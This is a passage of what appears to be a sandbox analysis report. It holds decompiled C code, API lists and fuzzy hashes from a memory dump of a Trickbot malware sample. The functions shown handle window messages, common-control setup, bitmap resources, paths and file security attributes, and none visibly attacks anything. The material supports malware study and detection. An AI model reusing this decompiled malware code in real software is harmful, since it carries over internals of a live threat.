                          								 *( *((intOrPtr*)(E00432562() + 4)) + 0xac) = _t494 - 0x40;
                          							}
                          							__eflags =  *(_t494 - 0x30) - _t387;
                          							if( *(_t494 - 0x30) != _t387) {
                          								__eflags =  *(_t494 - 0x30) - 3;
                          								if( *(_t494 - 0x30) != 3) {
                          									L29:
                          									_t248 = E0042AF65( *((intOrPtr*)(_t494 - 0x14)));
                          									_t249 = E00432562();
                          									_t388 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t249 + 4)))) + 0x7c))( *((intOrPtr*)(_t494 - 0x2c)));
                          									 *( *((intOrPtr*)(E00432562() + 4)) + 0xac) = _t494 - 0x40;
                          									SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0x1c)) + 0x1c), 0x111, 0xe108, 0);
                          									 *( *((intOrPtr*)(E00432562() + 4)) + 0xac) = 0;
                          									_t260 = E0042AF65( *((intOrPtr*)(_t494 - 0x14)));
                          									__eflags = _t260 - _t248;
                          									if(_t260 > _t248) {
                          										 *((intOrPtr*)( *_t388 + 0x7c))();
                          									}
                          									_t261 = E0042F1C4();
                          									__eflags = _t261;
                          									if(_t261 == 0) {
                          										PostMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0x1c)) + 0x1c), 0x10, 0, 0);
                          									}
                          									goto L33;
                          								}
                          								_push(3);
                          								_push(_t494 - 0x1c);
                          								_t273 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), 0x43e1f0);
                          								__eflags = _t273;
                          								_t389 = _t387 & 0xffffff00 | _t273 != 0x00000000;
                          								E00417EC8(_t494 - 0x1c);
                          								__eflags = _t389;
                          								if(_t389 != 0) {
                          									L27:
                          									 *(_t494 - 0x10) =  *(_t494 - 0x10) & 0x00000000;
                          									goto L33;
                          								}
                          								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffffd);
                          								_push(_t494 - 0x1c);
                          								_t279 = E004151D0(_t494 + 8);
                          								 *(_t494 - 4) = 7;
                          								E00417FB5(_t494 + 8, _t494, _t279);
                          								 *(_t494 - 4) = 1;
                          								E00417EC8(_t494 - 0x1c);
                          								_t390 = E0041828E(0x22);
                          								__eflags = _t390 - 0xffffffff;
                          								if(_t390 == 0xffffffff) {
                          									goto L27;
                          								}
                          								_push(_t390);
                          								_push(_t494 - 0x1c);
                          								_t284 = E0041524C(_t494 + 8);
                          								 *(_t494 - 4) = 8;
                          								E00417FB5(_t494 - 0x28, _t494, _t284);
                          								 *(_t494 - 4) = 1;
                          								E00417EC8(_t494 - 0x1c);
                          								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t390);
                          								_push(_t494 - 0x1c);
                          								_t291 = E004151D0(_t494 + 8);
                          								 *(_t494 - 4) = 9;
                          								E00417FB5(_t494 + 8, _t494, _t291);
                          								 *(_t494 - 4) = 1;
                          								E00417EC8(_t494 - 0x1c);
                          								_push(3);
                          								_push(_t494 - 0x1c);
                          								_t297 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), 0x43e1f0);
                          								__eflags = _t297;
                          								_t391 = _t390 & 0xffffff00 | _t297 != 0x00000000;
                          								E00417EC8(_t494 - 0x1c);
                          								__eflags = _t391;
                          								if(_t391 != 0) {
                          									goto L27;
                          								}
                          								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffffd);
                          								_push(_t494 - 0x1c);
                          								_t303 = E004151D0(_t494 + 8);
                          								 *(_t494 - 4) = 0xa;
                          								E00417FB5(_t494 + 8, _t494, _t303);
                          								 *(_t494 - 4) = 1;
                          								E00417EC8(_t494 - 0x1c);
                          								_t392 = E0041828E(0x22);
                          								__eflags = _t392 - 0xffffffff;
                          								if(_t392 == 0xffffffff) {
                          									goto L27;
                          								}
                          								_push(_t392);
                          								_push(_t494 - 0x1c);
                          								_t308 = E0041524C(_t494 + 8);
                          								 *(_t494 - 4) = 0xb;
                          								E00417FB5(_t494 - 0x24, _t494, _t308);
                          								 *(_t494 - 4) = 1;
                          								E00417EC8(_t494 - 0x1c);
                          								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t392);
                          								_push(_t494 - 0x1c);
                          								_t315 = E004151D0(_t494 + 8);
                          								 *(_t494 - 4) = 0xc;
                          								E00417FB5(_t494 + 8, _t494, _t315);
                          								 *(_t494 - 4) = 1;
                          								E00417EC8(_t494 - 0x1c);
                          								_push(3);
                          								_push(_t494 - 0x1c);
                          								_t321 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), 0x43e1f0);
                          								__eflags = _t321;
                          								_t393 = _t392 & 0xffffff00 | _t321 != 0x00000000;
                          								E00417EC8(_t494 - 0x1c);
                          								__eflags = _t393;
                          								if(_t393 != 0) {
                          									goto L27;
                          								}
                          								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffffd);
                          								_push(_t494 - 0x1c);
                          								_t327 = E004151D0(_t494 + 8);
                          								 *(_t494 - 4) = 0xd;
                          								E00417FB5(_t494 + 8, _t494, _t327);
                          								 *(_t494 - 4) = 1;
                          								E00417EC8(_t494 - 0x1c);
                          								_t491 = E0041828E(0x22);
                          								__eflags = _t491 - 0xffffffff;
                          								if(_t491 != 0xffffffff) {
                          									_push(_t491);
                          									_push(_t494 - 0x1c);
                          									_t332 = E0041524C(_t494 + 8);
                          									 *(_t494 - 4) = 0xe;
                          									E00417FB5(_t494 - 0x20, _t494, _t332);
                          									 *(_t494 - 4) = 1;
                          									E00417EC8(_t494 - 0x1c);
                          									_t337 =  *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t491;
                          									__eflags = _t337;
                          									_push(_t337);
                          									_push(_t494 - 0x1c);
                          									_t339 = E004151D0(_t494 + 8);
                          									 *(_t494 - 4) = 0xf;
                          									E00417FB5(_t494 + 8, _t494, _t339);
                          									 *(_t494 - 4) = 1;
                          									E00417EC8(_t494 - 0x1c);
                          									goto L29;
                          								}
                          								goto L27;
                          							} else {
                          								_t492 =  *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0x1c));
                          								_t394 =  *( *((intOrPtr*)(E00432562() + 4)) + 0x74);
                          								__eflags = _t394 - 0xffffffff;
                          								if(_t394 == 0xffffffff) {
                          									L14:
                          									_t346 = IsIconic( *(_t492 + 0x1c));
                          									asm("sbb eax, eax");
                          									_t349 = ( ~_t346 & _t482) + 5;
                          									__eflags = _t349;
                          									_t394 = _t349;
                          									L15:
                          									E0041B7D3(_t492, _t394);
                          									__eflags = _t394 - 6;
                          									if(_t394 != 6) {
                          										SetForegroundWindow( *(_t492 + 0x1c));
                          									}
                          									_t351 = E00432562();
                          									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t351 + 4)))) + 0x7c))( *((intOrPtr*)(_t494 - 0x2c)));
                          									_t354 = E0042F1C4();
                          									__eflags = _t354;
                          									if(_t354 == 0) {
                          										E0042F1B5(1);
                          									}
                          									 *( *((intOrPtr*)(E00432562() + 4)) + 0x74) =  *( *((intOrPtr*)(E00432562() + 4)) + 0x74) | 0xffffffff;
                          									L33:
                          									_t262 = E00432562();
                          									_t486 =  *(_t494 - 0x10);
                          									 *( *((intOrPtr*)(_t262 + 4)) + 0xac) =  *(_t494 - 0x18);
                          									goto L34;
                          								}
                          								__eflags = _t394 - 1;
                          								if(_t394 != 1) {
                          									goto L15;
                          								}
                          								goto L14;
                          							}
                          						}
                          						_t486 = 0;
                          						goto L34;
                          					}
                          					 *(_t494 - 0x30) = 2;
                          					_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffff8);
                          					_push(_t494 - 0x18);
                          					_t368 = E004151D0(_t494 + 8);
                          					 *(_t494 - 4) = 3;
                          					E00417FB5(_t494 + 8, _t494, _t368);
                          					 *(_t494 - 4) = 1;
                          					_t415 = _t494 - 0x18;
                          					goto L6;
                          				}
                          				 *(_t494 - 0x30) = 1;
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffff9);
                          				_push(_t494 - 0x18);
                          				_t374 = E004151D0(_t494 + 8);
                          				 *(_t494 - 4) = 2;
                          				E00417FB5(_t494 + 8, _t494, _t374);
                          				 *(_t494 - 4) = 1;
                          				_t415 = _t494 - 0x18;
                          				goto L6;
                          			}
                          (Per-line instruction addresses for the listing above, 0x0042afac through 0x0042b588, were extracted as a detached column with no alignment to the code lines and are omitted here.)

                          APIs
                          • __EH_prolog.LIBCMT ref: 0042AFAC
                            • Part of subcall function 0041524C: __EH_prolog.LIBCMT ref: 00415251
                            • Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC
                            • Part of subcall function 004151D0: __EH_prolog.LIBCMT ref: 004151D5
                            • Part of subcall function 00417FB5: InterlockedIncrement.KERNEL32(-000000F4), ref: 00417FF8
                          • IsIconic.USER32(?), ref: 0042B1FE
                          • SetForegroundWindow.USER32(?), ref: 0042B21F
                          • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 0042B504
                          • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0042B546
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog$InterlockedMessage$DecrementForegroundIconicIncrementPostSendWindow
                          • String ID: ","$[open("$[print("$[printto("
                          • API String ID: 3989956096-3790869113
                          • Opcode ID: 0d385b6b280b16694258770c4fd1946cbc45f8adab54de0473a3c72e34178578
                          • Instruction ID: 322305029b6920c44b1f2fc074338a34c946e435110a6dc26d67291c8b53ae42
                          • Opcode Fuzzy Hash: 0d385b6b280b16694258770c4fd1946cbc45f8adab54de0473a3c72e34178578
                          • Instruction Fuzzy Hash: 8912C831900209EFCB00EFB5C995EDEBBB4AF14354F10815EF815AB292DB7C9A85CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E0041B1EF(signed short _a4, signed int _a8) {
                          				struct HINSTANCE__* _t6;
                          				_Unknown_base(*)()* _t7;
                          				struct HINSTANCE__* _t13;
                          				struct HINSTANCE__* _t14;
                          				CHAR* _t16;
                          				signed short _t17;
                          
                          				_t16 = "COMCTL32.DLL";
                          				_t14 = GetModuleHandleA(_t16);
                          				_t6 = LoadLibraryA(_t16);
                          				_t13 = _t6;
                          				if(_t13 == 0) {
                          					return _t6;
                          				} else {
                          					_t17 = 0;
                          					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
                          					if(_t7 != 0) {
                          						_push(_a4);
                          						if( *_t7() != 0) {
                          							_t17 = _a4;
                          							if(_t14 == 0) {
                          								__imp__#17();
                          								_t17 = _t17 | 0x00003fc0;
                          							}
                          						}
                          					} else {
                          						if((_a8 & 0x00003fc0) == _a8) {
                          							__imp__#17();
                          							_t17 = 0x3fc0;
                          						}
                          					}
                          					FreeLibrary(_t13);
                          					return _t17;
                          				}
                          			}

                          Instruction addresses (one per decompiled line, in order): 0x0041b1f1, 0x0041b1ff, 0x0041b201, 0x0041b207, 0x0041b20b, 0x0041b263, 0x0041b20d, 0x0041b213, 0x0041b215, 0x0041b21d, 0x0041b23a, 0x0041b242, 0x0041b244, 0x0041b24a, 0x0041b24c, 0x0041b252, 0x0041b252, 0x0041b24a, 0x0041b21f, 0x0041b22e, 0x0041b230, 0x0041b236, 0x0041b236, 0x0041b22e, 0x0041b258, 0x00000000, 0x0041b25e

                          APIs
                          • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,0041B4E9,?,00020000), ref: 0041B1F8
                          • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 0041B201
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041B215
                          • #17.COMCTL32 ref: 0041B230
                          • #17.COMCTL32 ref: 0041B24C
                          • FreeLibrary.KERNEL32(00000000), ref: 0041B258
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Library$AddressFreeHandleLoadModuleProc
                          • String ID: COMCTL32.DLL$InitCommonControlsEx
                          • API String ID: 1437655972-4218389149
                          • Opcode ID: daf12d92571b40ecc4b22d454508836f8d58f8b00eb2e75938c6c53bb679496a
                          • Instruction ID: 92889b5e002c21d82985eea365ab80bd558b898f291d841b44894f592807a1a4
                          • Opcode Fuzzy Hash: daf12d92571b40ecc4b22d454508836f8d58f8b00eb2e75938c6c53bb679496a
                          • Instruction Fuzzy Hash: 30F0AF727402128B87119BA4DC4C9EFB2ACEFCC7617195476F940E3260CB78DC098BAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00413B90() {
                          				struct HBITMAP__* _t43;
                          				long _t50;
                          				signed int _t52;
                          				struct HRSRC__* _t118;
                          				struct HDC__* _t124;
                          				struct HINSTANCE__* _t125;
                          				void* _t126;
                          				void* _t128;
                          				void* _t129;
                          				void* _t131;
                          
                          				_t125 =  *(_t129 + 0x10);
                          				_t118 = FindResourceA(_t125,  *(_t129 + 8), 2);
                          				if(_t118 != 0) {
                          					_t50 = SizeofResource(_t125, _t118);
                          					_t126 = LoadResource(_t125, _t118);
                          					if(_t126 != 0) {
                          						_t128 = GlobalAlloc(0x40, _t50);
                          						if(_t128 != 0) {
                          							_t52 = _t50 >> 2;
                          							memcpy(_t128, _t126, _t52 << 2);
                          							memcpy(_t126 + _t52 + _t52, _t126, _t50 & 0x00000003);
                          							_t131 = _t129 + 0x18;
                          							 *(_t131 + 0x10) = 0;
                          							 *(_t131 + 0x10) =  *(_t131 + 0x20) >> 0x10;
                          							 *(_t128 + 0x28) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
                          							 *(_t131 + 0x10) = 0;
                          							 *(_t131 + 0x10) =  *(_t131 + 0x28) >> 0x10;
                          							 *(_t128 + 0x44) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
                          							 *(_t131 + 0x10) = 0;
                          							 *(_t131 + 0x10) =  *(_t131 + 0x24) >> 0x10;
                          							 *(_t128 + 0x48) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
                          							 *((intOrPtr*)(_t128 + 0x64)) = 0xbadbad;
                          							 *((intOrPtr*)(_t128 + 0x54)) = 0xbadbad;
                          							 *((intOrPtr*)(_t128 + 0x50)) = 0xbadbad;
                          							_t124 = GetDC(0);
                          							_t25 = _t128 + 0x68; // 0x68
                          							_t43 = CreateDIBitmap(_t124, _t128, 4, _t25, _t128, 0);
                          							ReleaseDC(0, _t124);
                          							GlobalFree(_t128);
                          							return _t43;
                          						} else {
                          							return 0;
                          						}
                          					} else {
                          						return 0;
                          					}
                          				} else {
                          					return 0;
                          				}
                          			}

                          Instruction addresses (one per decompiled line, in order): 0x00413b99, 0x00413ba9, 0x00413bad, 0x00413bc3, 0x00413bcd, 0x00413bd1, 0x00413be8, 0x00413bec, 0x00413bfe, 0x00413c01, 0x00413c08, 0x00413c08, 0x00413c14, 0x00413c22, 0x00413c3c, 0x00413c3f, 0x00413c49, 0x00413c65, 0x00413c6d, 0x00413c77, 0x00413c93, 0x00413cb3, 0x00413cd3, 0x00413ced, 0x00413cf6, 0x00413cfb, 0x00413d03, 0x00413d0e, 0x00413d15, 0x00413d24, 0x00413bee, 0x00413bf7, 0x00413bf7, 0x00413bd3, 0x00413bdc, 0x00413bdc, 0x00413baf, 0x00413bb8, 0x00413bb8

                          APIs
                          • FindResourceA.KERNEL32(?,?,00000002), ref: 00413BA3
                          • SizeofResource.KERNEL32(?,00000000,?,75B8679F,00000000,75B8DB4A,?,?,?,?,?,?,?,?,004117E1,00000001), ref: 00413BBD
                          • LoadResource.KERNEL32(?,00000000,?,75B8679F,00000000,75B8DB4A,?,?,?,?,?,?,?,?,004117E1,00000001), ref: 00413BC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Resource$FindLoadSizeof
                          • String ID:
                          • API String ID: 507330600-0
                          • Opcode ID: 3115cf56210fbae335df0030bf9c2b137c01719be5d41ca37075f0cd3e22a0a9
                          • Instruction ID: 366b2114bf5115eacef2465804abc64a5b97d3fa3aeaf90854397626f2dc3b8e
                          • Opcode Fuzzy Hash: 3115cf56210fbae335df0030bf9c2b137c01719be5d41ca37075f0cd3e22a0a9
                          • Instruction Fuzzy Hash: 0441FF327046155BE70CCE29A856AAF77D2EBC8341F048A3EF946C3381DFB19909C3A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E0041D790() {
                          				CHAR* _t29;
                          				CHAR* _t36;
                          				void* _t38;
                          				CHAR* _t47;
                          				void* _t53;
                          
                          				E00405340(E00438510, _t53);
                          				_t47 =  *(_t53 + 8);
                          				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
                          					_t29 =  *0x447478; // 0x44748c
                          					 *(_t53 + 8) = _t29;
                          					_push(_t53 + 8);
                          					 *(_t53 - 4) = 0;
                          					E0041D860(_t53, _t47);
                          					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
                          						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
                          							CharUpperA(_t47);
                          						}
                          						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
                          							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
                          							if(_t38 != 0xffffffff) {
                          								FindClose(_t38);
                          								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
                          							}
                          						}
                          						_push(1);
                          						_pop(0);
                          					}
                          					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
                          					E00417EC8(_t53 + 8);
                          					_t36 = 0;
                          				} else {
                          					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
                          					_t36 = 0;
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                          				return _t36;
                          			}

                          Instruction addresses (one per decompiled line, in order): 0x0041d795, 0x0041d7a2, 0x0041d7bb, 0x0041d7cf, 0x0041d7d4, 0x0041d7dc, 0x0041d7de, 0x0041d7e1, 0x0041d7fe, 0x0041d804, 0x0041d807, 0x0041d807, 0x0041d811, 0x0041d81d, 0x0041d826, 0x0041d829, 0x0041d839, 0x0041d839, 0x0041d826, 0x0041d83f, 0x0041d841, 0x0041d841, 0x0041d842, 0x0041d849, 0x0041d84e, 0x0041d7bd, 0x0041d7c2, 0x0041d7c8, 0x0041d7c8, 0x0041d855, 0x0041d85d

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041D795
                          • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0041D7B3
                          • lstrcpynA.KERNEL32(?,?,00000104), ref: 0041D7C2
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041D7F6
                          • CharUpperA.USER32(?), ref: 0041D807
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041D81D
                          • FindClose.KERNEL32(00000000), ref: 0041D829
                          • lstrcpyA.KERNEL32(?,?), ref: 0041D839
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                          • String ID:
                          • API String ID: 304730633-0
                          • Opcode ID: da020312d3d8d895f81e5f91db26ddbd9e93259d26d08d7181df88787c3a5777
                          • Instruction ID: 24804879cee2903c005afe8d2ce52d33a969091811ca508bb309db6612736586
                          • Opcode Fuzzy Hash: da020312d3d8d895f81e5f91db26ddbd9e93259d26d08d7181df88787c3a5777
                          • Instruction Fuzzy Hash: D32171B1900119BBCB10AF65DC48EEFBFBCEF45764F008126F929E61A0D7748A45CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0041F155(void* __ecx) {
                          				void* __esi;
                          				void* _t60;
                          				CHAR* _t83;
                          				void* _t95;
                          				struct _SECURITY_DESCRIPTOR* _t101;
                          				signed int _t102;
                          				void* _t120;
                          				CHAR** _t124;
                          				void* _t126;
                          
                          				E00405340(E00437A38, _t126);
                          				_t120 = __ecx;
                          				_t124 = __ecx + 0x10;
                          				E00417E53(_t124, _t124);
                          				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E0041E050( *(_t126 + 8), _t126 - 0x150) != 0) {
                          					_t83 =  *0x447478; // 0x44748c
                          					 *(_t126 - 0x10) = _t83;
                          					_t102 = 0;
                          					_push(_t126 - 0x10);
                          					 *(_t126 - 4) = 0;
                          					E0041D860(_t126,  *(_t126 + 8));
                          					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
                          						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
                          					}
                          					_t91 =  *((intOrPtr*)(_t126 - 0x144));
                          					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
                          					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
                          						_push(1);
                          						_push( *(_t126 + 8));
                          						_push(_t126 - 0x14);
                          						_t95 = E0041F0AF(_t136);
                          						 *(_t126 - 4) = 1;
                          						E00417FB5(_t124, _t126, _t95);
                          						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
                          						E00417EC8(_t126 - 0x14);
                          					}
                          					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
                          					E00417EC8(_t126 - 0x10);
                          				}
                          				_t58 =  *_t124;
                          				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E0041D108(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
                          					E00417E53(_t124, _t124);
                          					_t60 = E0041D108(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
                          				} else {
                          					E00418005(_t120 + 0xc,  *(_t126 + 8));
                          					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
                          						E0041E102(_t126 - 0x150, _t126 - 0x18);
                          						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
                          					}
                          					 *(_t126 + 0xc) = 0;
                          					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
                          						_t101 = E0041BDEB( *(_t126 + 0xc));
                          						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
                          							SetFileSecurityA( *_t124, 4, _t101);
                          						}
                          						E0041BE14(_t101);
                          					}
                          					_t60 = 1;
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
                          				return _t60;
                          			}

                          Instruction addresses (one per decompiled line, in order): 0x0041f15a, 0x0041f168, 0x0041f16a, 0x0041f16f, 0x0041f178, 0x0041f195, 0x0041f19a, 0x0041f1a0, 0x0041f1a2, 0x0041f1a3, 0x0041f1a9, 0x0041f1c9, 0x0041f1d2, 0x0041f1d2, 0x0041f1d6, 0x0041f1de, 0x0041f1e0, 0x0041f1e2, 0x0041f1e7, 0x0041f1ea, 0x0041f1eb, 0x0041f1f6, 0x0041f1fa, 0x0041f1ff, 0x0041f206, 0x0041f206, 0x0041f20b, 0x0041f212, 0x0041f212, 0x0041f217, 0x0041f21e, 0x0041f2d6, 0x0041f2e6, 0x0041f23a, 0x0041f240, 0x0041f25c, 0x0041f269, 0x0041f27f, 0x0041f27f, 0x0041f296, 0x0041f29d, 0x0041f2a7, 0x0041f2bb, 0x0041f2c2, 0x0041f2c2, 0x0041f2c9, 0x0041f2ce, 0x0041f2d1, 0x0041f2d1, 0x0041f2f1, 0x0041f2f9

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041F15A
                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 0041F1C1
                          • GetFileTime.KERNEL32(?,?,?,?,?), ref: 0041F254
                          • SetFileTime.KERNEL32(?,?,?,?), ref: 0041F27F
                          • GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 0041F299
                          • GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 0041F2B7
                          • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 0041F2C2
                            • Part of subcall function 0041D860: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 0041D887
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
                          • String ID:
                          • API String ID: 726943650-0
                          • Opcode ID: acdc8c74b8052b9a8aaab4cb0cc9f68c153388a4b92b63e8d08524ac2903572f
                          • Instruction ID: 7f327c1965ab9e3bf7884f38d1e285739f635e74d4210692c6787f36fd966ae2
                          • Opcode Fuzzy Hash: acdc8c74b8052b9a8aaab4cb0cc9f68c153388a4b92b63e8d08524ac2903572f
                          • Instruction Fuzzy Hash: 72512BB6500209BFDB01EFA1CC85EEEBBB9EF08354F00406AF915A6191DB759E85CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E0040A95E(void* __eflags) {
                          				int _v8;
                          				char* _v12;
                          				void* __ecx;
                          				char* _t18;
                          				intOrPtr _t19;
                          				intOrPtr _t23;
                          				char* _t27;
                          				char _t29;
                          				char _t30;
                          				signed int _t32;
                          				char _t34;
                          				void* _t35;
                          				char _t36;
                          				void* _t37;
                          				signed int _t39;
                          				signed int _t40;
                          				char* _t43;
                          				char* _t46;
                          				intOrPtr _t47;
                          				void* _t56;
                          				signed int _t60;
                          				signed int _t63;
                          				signed int _t65;
                          				signed int _t67;
                          				intOrPtr _t68;
                          				void* _t69;
                          				void* _t70;
                          				char* _t74;
                          				char* _t76;
                          				signed int** _t80;
                          				intOrPtr _t87;
                          				intOrPtr _t89;
                          
                          				_push(_t55);
                          				_t70 = 0xc;
                          				_v12 = 0;
                          				E00408042(_t70);
                          				 *0x448718 =  *0x448718 | 0xffffffff;
                          				 *0x448708 =  *0x448708 | 0xffffffff;
                          				 *0x44b978 = 0;
                          				 *_t80 = 0x43eabc;
                          				_t74 = E0040C065();
                          				_t56 = _t69;
                          				if(_t74 != 0) {
                          					if( *_t74 == 0) {
                          						L41:
                          						_t18 = E004080A3(_t70);
                          					} else {
                          						_t19 =  *0x44ba2c; // 0x0
                          						if(_t19 == 0) {
                          							L18:
                          							E004053B8( *0x44ba2c);
                          							_t23 = E0040511B(E00409BE0(_t74) + 1);
                          							 *0x44ba2c = _t23;
                          							if(_t23 == 0) {
                          								goto L41;
                          							} else {
                          								E0040A840(_t23, _t74);
                          								E004080A3(_t70);
                          								E0040B920( *0x4486fc, _t74, 3);
                          								_t27 =  *0x4486fc; // 0x44867c
                          								_t76 = _t74 + 3;
